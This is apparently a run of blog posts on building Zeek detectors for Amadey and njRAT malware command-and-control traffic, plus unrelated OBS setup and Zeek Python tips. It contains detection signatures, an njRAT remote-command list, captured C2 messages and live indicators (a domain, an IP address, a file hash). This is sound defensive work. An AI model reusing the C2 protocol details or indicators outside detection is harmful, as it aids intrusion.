[00:11:00] But what I wanna see is an OS version, which we talked about in our table, which is just a number. We wanna see the PC and the ampersands are part of it. We wanna see the PC and we wanna see the username. And I did put a catchall in between the OS and the PC and the username here to just give you some more leeway if there’s other fields in there.

[00:11:27] And then I say, okay, anything at the end, and the PC and the username are pretty freeform, so I left that as just anything as well. So you can see. Now, let me back up for a second. This will call a function inside Zeek. Now I’m gonna tell you right now we’re not gonna use Zeek’s signatures, so we’re not actually calling this, so you’re not gonna see it in main.zeek, I’m just telling you, if you were to go about it this way, this is how I would do it. I would make a function in there and I would call it through the signature. Now, what I wanna say is this, when I sat there and thought about it, yeah, it would hit on the PCAP that we found, but we don’t know what it will miss that would be valid Amadey malware C2 traffic. Things could be different. Like for instance, we could have fields that were flip flopped, you know, the username and the PC could be flip flopped and we wouldn’t catch it with this Zeek signature because of the way we had to code it. We’re not, we had to give it all one regular expression.

[00:12:35] And with that comes some order and with order comes some constraints on what we’re gonna be able to find. So, with that, I said, all right, if I want to get the most amount of detections of this Amadey malware, what would I do? I would probably look in the http data and I would then look for specific fields in that data, sort of like the signature, but I’d be a little looser in my matches so I could get more variance of this malware.

[00:13:07] Now what I wanna do is tell you about a better option, in my opinion, to detect this malware using this event handler. And I gave you the link. If you don’t know what this is, I gave you the link to the instructions so you can actually go there and see what the Zeek Project says about it. But, what I wanna do is basically there’s one field that comes into this event called data, and it is the data, and we’re gonna search this data for our fields using regular expressions.

[00:13:45] What I want to tell you though, is do note that every HTTP session and every entity in that session is being sent through this event. So you wanna use this event very, very sparingly. In my case, I’m trying to show you the two different ways you can go about detecting this malware.

[00:14:06] So in some networks, this may cause a lot of CPU usage, and I can’t even tell you what quote unquote a lot means because it just depends on the networks, how you have your cluster set up and so forth.

[00:14:21] So what I’m saying here is I’m putting a big red warning sign that says, do know when you run this logic, and we’re looking at all the content of HTTP sessions that go across. This can be taxing on your sensor and do know that you may decide the CPU load is just not for you, and you don’t care about the Amadey malware at all, so you don’t wanna run this.

[00:14:46] Other people, they may really care a lot about this, and they will give up the CPU cycles in order to be able to run this. So with that said, I try to do as little computation as possible in this event because it’s gonna be called many, many, many, many times.

[00:15:06] Now, the logic is actually fairly simple and I just cut out. There’s a lot of boiler plate stuff in the code to make logs and so forth. So I just wanted to cut out the event handler and show you the guts of this detection and it’s on your screen right now. And you can see this is the event that we are handling.

[00:15:28] It’s just this one of the standard Zeek events. We didn’t have to do anything fancy to get it. And what we do is we have a giant if statement. And what that if statement does is the first part of the IF statement, which I’ll highlight for you. Now here, this looks for the ID in data. If that matches, if it’s in there, if it’s true, the two ampers hand says, okay, go compute the next thing.

[00:16:01] Which is, let’s find the ampersand vs in there. If that is true, let’s look for the next field, which is the os. If that’s true, then we look for the bi, the ar, the pc, and the un.

[00:16:18] Now, why this is different than our Zeek signature is this gets rid of order, so, for instance, if it finds the ID first, cuz that’s what it looks like, it always gets sent first here, we have then a Vs that it’s searching for, right? Let’s say the variant tried to be tricky and it goes, ah, I’m gonna put the OS before the Vs. So that way if people are looking for things in certain order, this is gonna break it. Well, the Zeek code I’m showing you right now will detect it because what it’s doing is it’s simply looking for the field in the data.

[00:17:01] Okay? And we’re giving up computation because we have to handle the HTTP entity data event. We’re giving up computation in order to be more inclusive of more variants of this Amadey malware.

[00:17:18] Okay, and I may change this. I was thinking maybe instead of doing an in, I do a carrot there and actually look for the ID at the beginning. I’ll ponder whether or not I change it. Maybe it’ll be a little different by the time you see this video, but you get the, the gist of what I’m trying to say here. Right?

[00:17:38] All right, so, First thing I’m gonna do is if we have a detection, so we’re inside the IF statement now, if we have a detection, I’m gonna set my session, which is, this is just boiler plate. It sets the info record on the connection record so we can then start to save data and make it into logs and stuff.

[00:18:01] This is a pretty common Zeek methodology.

[00:18:04] Now what I do in the next line is I take the data that came in up here. See up here where I’m moving my mouse? Well, we’re taking that data and we’re slapping it into our Amadey dot log payload field. So I’m making a brand new log and there’s a payload field, and the payload’s gonna have whatever was sent across the C2 that we detected.

[00:18:33] And then so we know which way the connection happened, I’m gonna save the is_orig in there as well. And then once it’s saved, we just emit it. So like I said, this is very, very simple logic.

[00:18:46] Now another thing I’m gonna do is we are in the IF statement, so we’re assuming we’ve seen the malware. At this point, I’m gonna also fire a notice.

[00:18:55] So we get this notice in our notice log as well because some investigators like it in the notice log and some investigators like it in its own log. Me, I personally like it in its own log, so that’s why I made an Amadey dot log to do more analysis deeper rather than just seeing something in the notice log.

[00:19:18] It’s a hotly debated to topic in the Zeek community, I’m sure.

[00:19:23] All right, so what I did is I explained why I use all these different, and it basically cuts down on processing cuz if any one of those ands fails, the rest of ’em aren’t computed. So here’s an example Amadey dot log. And this came from the tests that’s why you see a bunch of X’s in there. But you can see the Pcap, when I ran it through, it picked up on this connection. And lo and behold, we have that string that Amadey sends out for its C2 protocol. We detected it and it’s in our log, so that way we can actually, as an investigator now look at the same data that the C2 control panel is getting from these malware infections on the network we’re monitoring.

[00:20:14] That’s it, and you’ll see that I put sources in here. So all this stuff that I talked about, you can go through here and click it. And I obviously can’t put it in now because I’m recording, but it will have a transcript of this video as well. So, you can search for things very quickly or if you have difficulty hearing, you can read this instead of having to watch a video.

[00:20:38] That’s all I got to say. I hope you catch us on the next video soon. Thanks. Bye.

[00:20:44]

#zeek #opensource #cybersecurity #amadey #malware

The post Detecting Amadey Malware With Zeek – Zeek Roulette #2 first appeared on DrKeithJones.com.

This is an update to:

Detecting njRAT/Bladabindi Malware With Zeek – Zeek Roulette #1

I have been running this detector on a live network for a while and I’ve seen 2 (rare) categories of false positives we can easily eliminate by improving on the code just a little bit.

The first false positive occurs when the message length is zero. We can eliminate this false positive by adding a requirement in our Spicy code on the njRATMessage unit:

public type njRATMessage = unit {
    len: /[0-9]+/ &convert=bytes2uint($$);
    : /\x00/;
    payload: bytes &size=self.len;
} &requires=(self.len > 0);

The second false positive occurs when there is traffic that looks like njRAT, but doesn’t use a valid, known, njRAT commands. I did some research here:

• https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/
• https://hidocohen.medium.com/njrat-malware-analysis-198188d6339a

I found that the sources above say we should expect the following commands from njRAT:

• ll
• proc
• rss
• rs
• rsc
• kl
• inf
• prof
• rn
• inv
• ret
• CAP
• P
• un
• up
• RG
• nwpr
• site
• fun
• IEhome
• shutdowncomputer
• restartcomputer
• logoff
• ErrorMsg
• peech
• BepX
• piano
• OpenCD
• CloseCD
• EnableKM
• DisableKM
• TurnOnMonitor
• TurnOffMonitor
• NormalMouse
• ReverseMouse
• EnableCMD
• DisableCMD
• EnableRegistry
• DisableRegistry
• EnableRestore
• DisableRestore
• CursorShow
• CursorHide
• sendmusicplay
• OpenSite
• dos
• udp
• udpstp
• pingstop
• pas

So now all we need to do is put this list of valid commands into our DPD signature to cut down on false positives:

signature dpd_njrat {
    ip-proto == tcp
    payload /^[0-9]+\x00(ll|proc|rss|rs|rsc|kl|inf|prof|rn|inv|ret|CAP|P|un|up|RG|nwpr|site|fun|IEhome|shutdowncomputer|restartcomputer|logoff|ErrorMsg|peech|BepX|piano|OpenCD|CloseCD|EnableKM|DisableKM|TurnOnMonitor|TurnOffMonitor|NormalMouse|ReverseMouse|EnableCMD|DisableCMD|EnableRegistry|DisableRegistry|EnableRestore|DisableRestore|CursorShow|CursorHide|sendmusicplay|OpenSite|dos|udp|udpstp|pingstop|pas)\|/
    enable "spicy_NJRAT"
}

The post njRAT/Bladabindi Zeek Detector Update – Zeek Roulette #1 Part 2 first appeared on DrKeithJones.com.

This method will let you make your voice sound sexy through any application like Zoom, Microsoft Teams, StreamYard, etc.

After installing OBS, you will need to install the donationware Virtual Audio Cable application from:

https://vb-audio.com/Cable/

If you select this virtual cable as your output, anything that uses it as input will hear your output. It’s that simple! This virtual cable will be the input to where we want our voice to sound sexy, like a Zoom conference, Webinar, etc.

Go into OBS->Settings->Audio and set your audio monitor to this virtual cable. Now any audio sources set to monitor audio will be forwarded to the virtual cable.

Now, go to your USB microphone audio source in OBS and add three filters: a compressor, a 3 band equalizer (set low frequencies to +6dB, 0dB for mid range, and high frequencies to -6db), and noise suppression. Keep the defaults if you do not know what the parameters are for. Now keep OBS open and it will turn your voice from zero to turbo sexy instantly! That’s all you need to do!

Now add your virtual microphone as your microphone to the application you need to sound sexy in!

If you want to play sounds along with your voice through the virtual microphone and still hear the sounds in your headphones, I recommend you download and install the Audio Monitor plugin from this link:

https://obsproject.com/forum/resources/audio-monitor.1186/

https://github.com/exeldro/obs-audio-monitor

This plugin will let you attach an “Audio Monitor” filter on any audio source and point a copy of the audio to an extra device, like your headphones. You can still have this sound source set to output (to the recording) and monitor (to the virtual microphone) while sending the sound to your headphones too! It’s like magic for your sexy-ification needs.

If you are a man, you will sound like Barry White now. If you are a woman, I am sorry to inform you that you will sound like Elizabeth Holmes.

The post How To Make Your Voice Sound Sexy Using A USB Microphone On A MacBook first appeared on DrKeithJones.com.

Welcome to the first edition of Zeek Roulette, where I pick a random Zeek topic and try to solve it!

For this article I picked njRAT malware from Any.Run and tried to write a detector for it. There is a copy of the njRAT malware, PCAP, and its analysis available here:

https://app.any.run/tasks/72f74893-b9dc-4b1d-9d55-39e0eae86bda/#

If you download the PCAP file and run it through Zeek, you will see the following line in conn.log:

1681921215.277831	CF6WFfOHjuxFz6wtc	192.168.100.204	49228	3.68.56.232	15145	tcp	-	41.031513	1268	10585	S1	-	-	0	ShADaTdt	12	1999	10	5280	-

This is where the malware’s C2 happens.

First, we need to understand njRAT’s C2 protocol. After a little Googling I found this article and Suricata rule set:

njRAT

Discovered almost a decade ago, njRAT, also known as Bladabindi, is the most active and prevalent remote access trojan. It allows attackers to do surveillance and control the victim’s computer. Its features include remote desktop, logging keystrokes, stealing credentials, capturing microphone and webcam, and many more. njRAT is mostly found to be delivered via phishing email campaigns containing malicious Word document attachments. It is also found to be delivered by masquerading as a legitimate application installer uploaded to file-sharing services and luring victims via drive-by download campaigns.

Since the leak of source code 2013, njRAT has become widely adopted by cybercriminals and APT actors including Gorgon Group and APT41. Numerous variants have been detected over the years. Some variants have been found to be communicating over standard HTTP protocol and others were found to be communicating over custom protocols over TCP. The packet begins with data length in a decimal format null-terminated string followed by command and then delimiter followed by exfiltrated data.

…

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:”Zscaler Win32.Backdoor.NjRat – Data Exfil activity”; flow:to_server,established; content:”|00|inf”; offset:3; depth:4; pcre:”/\d{1,3}\x00\w{1,3}/”; pcre:”/(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?/”; flowbits:isset,ZS.njrat; flowbits:unset,ZS.njrat; classtype:trojan-activity; reference:url,https://research.zscaler.com;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:”Zscaler Win32.Backdoor.NjRat – Data Exfil activity”; flow:to_server,established; content:”|00|ll”; offset:3; depth:3; pcre:”/^\d{1,3}\x00/”; pcre:”/(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?/”; flowbits:set,ZS.njrat; flowbits:noalert; classtype:trojan-activity; reference:url,https://research.zscaler.com;)

https://securityboulevard.com/2021/05/catching-rats-over-custom-protocols/

We can use the general information from the article quoted above to write Zeek detection logic too.

First, we know that each message fits a known format of message length (in ASCII, only counting characters coming after the NULL), a NULL character, a command (in ASCII), and then a delimiter. After the delimiter comes the remaining data, also delimited.

In the PCAP for this malware sample, the first message example is (<NULL> is literally 0x00 in this case):

156<NULL>ll|'|'|SGFjS2VkX0M0QkEzNjQ3|'|'|USER-PC|'|'|admin|'|'|23-04-19|'|'||'|'|Win 7 Professional SP1 x86|'|'|No|'|'|im523|'|'|..|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==|'|'|152.inf|'|'|SGFjS2VkDQo3LnRjcC5ldS5uZ3Jvay5pbzoxNTE0NQ0KQWxsVXNlcnNQcm9maWxlDQpTeXN0ZW0uZXhlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVl32.act|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==

Here, the delimiter is:

|'|'|

This delimiter can change, so we will design our detector to be delimiter indifferent!

We can write a Spicy protocol analyzer to detect this type of C2. First, we use the following dynamic protocol detection (DPD) signature to trigger our Spicy njRAT C2 protocol analyzer with the message format specified above:

signature dpd_njrat {
    ip-proto == tcp
    payload /^[0-9]+\x00[a-zA-Z]+\|/
    enable "spicy_NJRAT"
}

The Spicy code for this analyzer is pretty simple and follows:

module NJRAT;

function bytes2uint(input: bytes) : uint64 {
    local exp: uint64 = |input|;
    local sum: uint64 = 0;
    local val: uint64;
    local shift: uint64;

    for (c in input)
        {
        exp--;
        val = c-48;
        shift = 10**exp;
        sum = sum + ( val * shift );
        }
    return sum;
}

public type njRATMessages = unit {
    messages: njRATMessage[];
};

public type njRATMessage = unit {
    len: /[0-9]+/ &convert=bytes2uint($$);
    : /\x00/;
    payload: bytes &size=self.len;
};

Any time a njRATMessage is parsed, the Spicy EVT file specifies that the following event fires:

event NJRAT::message(c: connection, is_orig: bool, payload: string)

This event is handled in main.zeek to create an njrat.log entry where each line represents a command.

After installing this package, the connection log will now look like the following (note the service of spicy_njrat!):

1681921215.277831	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	tcp	spicy_njrat	40.956665	1268	10585	S1	-	-	0	ShADaTdt	10	1895	8	2788	-

And the njrat.log will look like the following:

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	njrat
#open	2023-04-20-12-16-33
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	is_orig	payload
#types	time	string	addr	port	addr	port	bool	string
1681921215.595297	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	T	ll|'|'|SGFjS2VkX0M0QkEzNjQ3|'|'|USER-PC|'|'|admin|'|'|23-04-19|'|'||'|'|Win 7 Professional SP1 x86|'|'|No|'|'|im523|'|'|..|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==|'|'|
1681921215.674016	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	T	inf|'|'|SGFjS2VkDQo3LnRjcC5ldS5uZ3Jvay5pbzoxNTE0NQ0KQWxsVXNlcnNQcm9maWxlDQpTeXN0ZW0uZXhlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVlDQpUcnVl
1681921221.103591	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	T	act|'|'|UHJvZ3JhbSBNYW5hZ2VyAA==
1681921256.102097	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	F	CAP|'|'|35|'|'|23
1681921256.170255	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	T	CAP|'|'|\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c $.' ",#\x1c\x1c(7),01444\x1f'9=82<.342\xff\xdb\x00C\x01\x09\x09\x09\x0c\x0b\x0c\x18\x0d\x0d\x182!\x1c!22222222222222222222222222222222222222222222222222\xff\xc0\x00\x11\x08\x00\x17\x00#\x03\x01"\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01}\x01\x02\x03\x00\x04\x11\x05\x12!1A\x06\x13Qa\x07"q\x142\x81\x91\xa1\x08#B\xb1\xc1\x15R\xd1\xf0$3br\x82\x09\x0a\x16\x17\x18\x19\x1a%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02w\x00\x01\x02\x03\x11\x04\x05!1\x06\x12AQ\x07aq\x13"2\x81\x08\x14B\x91\xa1\xb1\xc1\x09#3R\xf0\x15br\xd1\x0a\x16$4\xe1%\xf1\x17\x18\x19\x1a&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xe6\xff\x00\xb2\xa6\x92(\x8b\x82T\x96\x00\x95\xc7Lf\xae&\x84\xdb3\xb0\xfeU\xd9hZ\x02\xdc\x04|\x82=3\x9cV\xbe\xa5j\x96\x0d\x06\xd8\xf7\x01"\xee\xda\xbb\xb0;\x9c}\x05}\\\xb1<\xab\x92:\xc8\xf8\xceyN\xa3\x93\xd27\xe9\xfa\x1eYu\xa5\x98\xf2\x0a\xe0\xd6\x1d\xcd\xb1BH\x15\xec\xde2[W\xd2\xed\xe6\x8d 2\xce\xc5\xfc\xc5\xe1\xca\xf6\x0c1\xc7\x18\xaf/\xbe\x88s\xc5V\x06\xb3\xc5\xd0\xf6\x8d%\xabZ;\xad7\xfcM\xaa?c[\x91;\xaf\xf39\xfd\xc4q\x9a*f\x8cn4Q\xec\x8e\x9es\xdf|>\xb3Z\xda\x85\x9a\x12\x1d\xba`\x8cc\xb53Q\x82\xfavm\x90n\xcf\xfbc\xfch\xa2\xbe~8\xd9\xa9\xf3Y~?\xe6vK+\xa4\xe0\xa3\xcc\xff\x00\x0f\xf29\xeb\xad\x03U\x9f\xa5\xb8\x1e\x99\x91\x7f\xc6\xb0.\xfc%\xae8$X\xff\x00\xe4T\xff\x00\xe2\xa8\xa2\xbbVs]+Y~?\xe6D2z\x09\xde\xef\xf0\xff\x00#4\xf8'Y\xcf6\xea\x0fq\xe6/\x1f\xad\x14QS\xfd\xa7Y\xf4_\xd7\xcc\xdf\xea4\xbb\xb3\xff\xd9
#close	2023-04-20-12-16-33

At this point the commands in the payloads could be split with the following function:

https://docs.zeek.org/en/master/scripts/base/bif/strings.bif.zeek.html#id-split_string

But, since we don’t know what delimiter the attackers will use I chose to leave the full string in the log.

Fixing The PCAP

Hah hah, not so fast! Now you would think this code would work with the PCAP referenced throughout this article, wouldn’t you? Well the PCAP, as downloaded from Any.Run, cuts the C2 connection short and therefore the Spicy analyzer will not detect it as njRAT. I fixed the PCAP by removing the last fragment of the C2 communications and saved it here:

https://github.com/keithjjones/zeek-njrat-detector/tree/master/testing/Traces

njRAT IOCs And Zeek’s Intelligence Framework

We also see that Any.Run has some IOCs listed for this sample:

SHA256:  3f1a2a27304c02ea6e56bfd81b0bfc4cf8db5040c23f854d09b6728b1803a8b9

Domain:  7.tcp.eu.ngrok.io

IP:  3.68.56.232

While not as robust as our Spicy njRAT C2 analyzer, we can add IOCs to Zeek’s intelligence framework with the following function:

https://docs.zeek.org/en/master/scripts/base/frameworks/intel/main.zeek.html#id-Intel::insert

The code I used was:

	local intel_item = [$indicator="7.tcp.eu.ngrok.io", $indicator_type=Intel::DOMAIN, $meta=[$source="njRAT", $url="https://app.any.run/tasks/72f74893-b9dc-4b1d-9d55-39e0eae86bda/#"]];
	Intel::insert(intel_item);

	intel_item = [$indicator="3.68.56.232", $indicator_type=Intel::ADDR, $meta=[$source="njRAT", $url="https://app.any.run/tasks/72f74893-b9dc-4b1d-9d55-39e0eae86bda/#"]];
	Intel::insert(intel_item);

	intel_item = [$indicator="3f1a2a27304c02ea6e56bfd81b0bfc4cf8db5040c23f854d09b6728b1803a8b9", $indicator_type=Intel::FILE_HASH, $meta=[$source="njRAT", $url="https://app.any.run/tasks/72f74893-b9dc-4b1d-9d55-39e0eae86bda/#"]];
	Intel::insert(intel_item);

And we load the intelligence framework with the following load commands:

@load frameworks/intel/seen
@load base/frameworks/intel/files.zeek

Now, the intel.log for this PCAP looks like the following:

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	intel
#open	2023-04-20-12-44-15
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	seen.indicator	seen.indicator_type	seen.where	seen.node	matched	sources	fuid	file_mime_type	file_desc
#types	time	string	addr	port	addr	port	string	enum	enum	string	set[enum]	set[string]	string	string	string
1681921215.261590	C1Xkzz2MaGtLrc1Tla	192.168.100.204	52145	192.168.100.2	53	7.tcp.eu.ngrok.io	Intel::DOMAIN	DNS::IN_REQUEST	zeek	Intel::DOMAIN	njRAT	-	-	-
1681921215.341329	CqlVyW1YwZ15RhTBc4	192.168.100.204	49228	3.68.56.232	15145	3.68.56.232	Intel::ADDR	Conn::IN_RESP	zeek	Intel::ADDR	njRAT	-	-	-
#close	2023-04-20-12-44-15

KilerRAT

Note this will work for RAT variants, like KilerRAT too:

https://cybersecurity.att.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off

KilerRAT uses the following delimiter instead:

|kiler|

Since the delimiter was not hard coded into our detector, we will still detect this variant.

The Source Code

You can install or see the full source code of this package from:

https://github.com/keithjjones/zeek-njrat-detector

You can install this package with:

zkg install https://github.com/keithjjones/zeek-njrat-detector

More Info

Here is a good link with more info: https://hidocohen.medium.com/njrat-malware-analysis-198188d6339a

You can read an update here: njRAT/Bladabindi Zeek Detector Update – Zeek Roulette #1 Part 2

If none of this made sense to you, check out my Zeek videos over at YouTube to learn more of the technology in this article.

The post Detecting njRAT/Bladabindi Malware With Zeek – Zeek Roulette #1 first appeared on DrKeithJones.com.

I do a fair amount of recording for my YouTube channel on a MacBook Pro, circa 2019. It has the Intel chip. Nothing I found online worked exactly for me when I used OBS, so here are the settings that worked for me, in case they are useful for someone else.

First, put the cable that came with the camera aside and get a high speed USB-C to USB-C cable. This was my first mistake. USB-C to USB-A adapters were getting in the way and either slowing down my video or making the camera flicker. When I spent $15 on a new cable, everything started working well. I use a USB-C 3.2 Gen 2 cable rated up to 20 Gbps.

Second, make a “4k” profile and a “4k” scene in OBS. Go to Settings->Video and make both the base and output resolutions to 3840×2160 at 24 frames per second. I record to files, so I go to Output->Recording (make sure Advanced Output Mode is selected to see all the fields). I use the “Apple VT H264 Hardware Encoder” encoder at 100,000 Kbps bitrate, with the “high” profile.

If you stream, you could probably use the same settings as a start and fiddle with it from there. I do not currently stream so I don’t have further recommendations for this section.

Add your microphone and video source. Make your video source the Logitech Brio at 3840×2160 at 24 frames per second. 30 frames per second was slightly too fast for my laptop to keep up with.

I keep all the rest of the configuration the default values.

Now if your microphone is sending data faster than your camera, you will need to delay your microphone by around 200 ms. You can get to this setting in the settings cog in the Audio Mixer tab when you click on the microphone source in the Sources tab.

I found this YouTube reference page here on bitrates:

https://support.google.com/youtube/answer/1722171?hl=en#zippy=%2Cvideo-codec-h%2Cbitrate

My preview video will have a little lag when writing 4k files, but when I review the video files directly with VLC they look fine.

The post Using Logitech Brio In 4K In OBS On A 2019 Intel MacBook Pro first appeared on DrKeithJones.com.

I put together a Zeek clustering video over at Youtube (https://youtu.be/g-QvpYHgh1c).

You can get to the slides through:

https://docs.google.com/presentation/d/1HHHF4-FNhoSuy-YPMOWka3EGvfOW7CJAFeS9VHxBg_E/edit?usp=sharing

The source code is available at:

https://github.com/corelight/CVE-2022-24491

The post Zeek Clustering How-To Video first appeared on DrKeithJones.com.

I put a video together (https://www.youtube.com/watch?v=PcXjkUt3rZA) discussing a method I have used to detect CVEs using just Zeek signatures:

https://docs.zeek.org/en/master/frameworks/signatures.html

This method is useful when trying to detect a CVE exploit in a protocol that is not fully parsed by Zeek. In this video we discuss a CVE for portmapper, which is a protocol not natively supported by Zeek.

In this video we are not teaching you about detecting specific CVEs as much as I am trying to teach you the method of CVE detection using only Zeek signatures when Zeek can’t fully parse the connection.

My slides (all the links are clickable): https://docs.google.com/presentation/d/1lJGNphy6bGwtEBOGGDgQQpLe-kOCpJk5LEX881OUzkc/edit?usp=sharing

The post Using Zeek Signatures To Detect CVEs first appeared on DrKeithJones.com.

… we found an interesting situation. Even when you call “suspend_processing” in zeek_init, like this:

event zeek_init() &priority=10
{
	suspend_processing();
}

event new_connection(c: connection)
{
	print("NEW"); 
}
event connection_state_remove(c: connection)
{
	print("REMOVE"); 
}

… Zeek will still process the first packet. The “new_connection” and “connection_state_remove” events will still fire for that first packet/connection. This is what the output looks like:

$ zeek -Cr ../dnp3_example.pcap ./test.zeek
processing suspended
NEW
PEERADDED
REMOVE

… for the PCAP located here:

https://github.com/cisagov/icsnpp-dnp3/blob/main/tests/traces/dnp3_example.pcap

The post Zeek’s suspend_processing Quirk With PCAPs first appeared on DrKeithJones.com.

https://github.com/zeek/spicy/wiki/Performance-profiling-of-Spicy-parsers

The post How To Profile A Zeek Spicy Protocol Analyzer first appeared on DrKeithJones.com.

https://github.com/corelight/zeek-spicy-ipsec

You can install the latest version with the following command:

zkg install zeek-spicy-ipsec

The post Zeek Spicy IPSec Protocol Analyzer Update – v0.2.17 first appeared on DrKeithJones.com.

The post My Zeek How-To Video Playlist first appeared on DrKeithJones.com.

https://github.com/corelight/zeek-spicy-ospf

You can install the latest version with the following command:

zkg install zeek-spicy-ospf

The post Zeek Spicy OSPF Packet Analyzer Update – v0.1.4 first appeared on DrKeithJones.com.

How To Connect Zeek To Python

Subscribe and like if you would like to see more!

The post YouTube Video For How To Connect Zeek To Python Is Up! first appeared on DrKeithJones.com.

The code for this demo is available here:

https://github.com/keithjjones/zeek-python-broker-demo

The first piece of our source code is the Python program here:

https://github.com/keithjjones/zeek-python-broker-demo/blob/master/broker-test.py

There is a prerequisite for this Python script, the Zeek Python Broker bindings must be downloaded and installed. You can find the installation instructions here:

https://docs.zeek.org/projects/broker/en/master/python.html#installation-in-a-virtual-environment

The trick is you must install the version of broker that corresponds to your Zeek’s version. Be sure to read that last sentence again. I figured this out the hard way.

Your version of Broker can be looked up by visiting the Zeek repository and selecting your Zeek version in the branch dropdown, such as v5.0.4. Then, go into the “auxil” directory to find Broker:

https://github.com/zeek/zeek/tree/v5.0.4/auxil

If you click into the Broker directory you will enter its repository at the version used in Zeek v5.0.4. If you click on “VERSION”, you will find version 2.3.5 of Broker is used in Zeek v5.0.4:

https://github.com/zeek/broker/blob/a7d55f8da2c47bf8b3de2524b24e1d8bfec1c2ce/VERSION

You can download Broker v2.3.5 here:

https://github.com/zeek/broker/releases

Once you download Broker and install the Python bindings using the instructions linked above, you can finally execute the Python script. Here is the script’s content:

import sys
import broker

# Setup endpoint and connect to Zeek.
with broker.Endpoint() as ep, \
    ep.make_subscriber("/topic/test") as sub:

    ep.listen("127.0.0.1", 60000)

    while True:
        (t, d) = sub.get()
        pong = broker.zeek.Event(d)
        print("received {}  --   {}".format(pong.name(), pong.args()))

        python_results = broker.zeek.Event("python_results", pong.args()[0]);
        ep.publish("/topic/test", python_results);

The script is relatively simple. The following lines set up a Zeek Broker listener on 127.0.0.1:60000 via Python:

https://github.com/keithjjones/zeek-python-broker-demo/blob/master/broker-test.py#L5-L8

Then, the Python script runs in an infinite loop pulling messages from Broker via the “get” function:

https://github.com/keithjjones/zeek-python-broker-demo/blob/master/broker-test.py#L11

Here “t” is the message’s topic, and “d” is the message’s raw data. Line 12 then translates the data pulled from Broker into a Python event object called “pong”. The name “pong” is not important, I wanted to show that this object could be named anything because the “.name()” function will tell you the true event name.

The last two lines in the script then create an event object and publishes it through Broker so that the “python_results” event will fire back in Zeek. The event will have the same argument that was originally passed to the Python process from Zeek (“pong.args()[0]”). Here is example output from the Python script:

received some_test_event  --   [(IPv4Address('172.20.32.121'), 47808/udp, IPv4Address('172.20.32.255'), 47808/udp)]
received some_test_event  --   [(IPv4Address('172.20.32.109'), 47808/udp, IPv4Address('172.20.32.255'), 47808/udp)]
received some_test_event  --   [(IPv4Address('172.20.32.200'), 47808/udp, IPv4Address('172.20.32.115'), 47808/udp)]
received some_test_event  --   [(IPv4Address('172.20.32.200'), 47808/udp, IPv4Address('172.20.32.112'), 47808/udp)]
received some_test_event  --   [(IPv4Address('172.20.32.200'), 47808/udp, IPv4Address('172.20.32.110'), 47808/udp)]
received some_test_event  --   [(IPv4Address('172.20.32.200'), 47808/udp, IPv4Address('172.20.32.121'), 47808/udp)]
